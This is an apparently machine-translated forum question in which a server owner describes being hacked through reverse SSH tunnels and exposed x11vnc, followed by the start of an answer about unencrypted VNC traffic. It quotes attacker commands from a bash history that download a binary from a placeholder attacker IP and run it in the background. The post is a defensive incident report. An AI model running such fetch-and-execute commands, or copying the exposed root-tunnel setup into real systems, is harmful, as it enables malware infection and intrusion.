Итак, сегодня я был взломанный. Мне очень непонятно, как это было сделано, поэтому я ищу опытных людей, чтобы показать слабые места в дизайне моих систем.
У меня два сервера. Один из них - VPS с подключением к Интернету (server1), второй - сервер внутри частной сети (server2), подключенный к первому через обратный туннель ssh, открывая порты 22 (SSH) и 5900 (x11vnc) в Интернет. Оба сервера Ubuntu 14.04.
Я использую эти команды для создания обратного туннеля ssh (на server2):
autossh -fR \*:4202:localhost:22 -N root@server1.com
autossh -fR \*:5900:localhost:5900 -N root@server1.com
Еще немного подробностей о настройке SSH на моих серверах.
Есть эта строка:
Указанные клиенты GatewayPorts
Что касается x11, Я использую эту команду для создания сервера x11vnc:
/usr/bin/x11vnc -dontdisconnect -notruecolor -noxfixes -shared -forever -rfbport 5900 -bg -o /home/{username}/.vnc/x11vnc.log -rfbauth /home/{username}/.vnc/passwd -auth /var/lib/mdm/:0.Xauth
Мой пароль для VNC очень хороший.
server1 активно брутально, но у меня нет никаких доказательств того, что это было взломано.
Вы не можете получить доступ к server2 с server1 без пароля.
Итак, сегодня я нашел это в своем .bash_history на server2:
wget http://{HACKER_IP}:8080/heng
chmod 0755 /root/heng
chmod 0755 ./heng
/dev/null 2>&1 &
nohup ./heng > /dev/null 2>&1 &
{HACKER_IP} сообщил виртуальный итог как тот, кто распределяет Win32.Ramnit.
/var/log/auth.log чистый.
хенг процесс был в моей памяти, но не на диске. Я выключил свою систему, поэтому у меня ее больше нет.
Как это возможно server2 скомпрометирован до server1 ? Он живет в нестандартном порту 4202 и использует довольно хорошую комбинацию логина и пароля.
Как мне этого избежать в будущем?
Насколько я могу судить по вашей настройке, трафик VNC не зашифрован. Было бы легко вернуть сеанс к серверу server2. Видеть: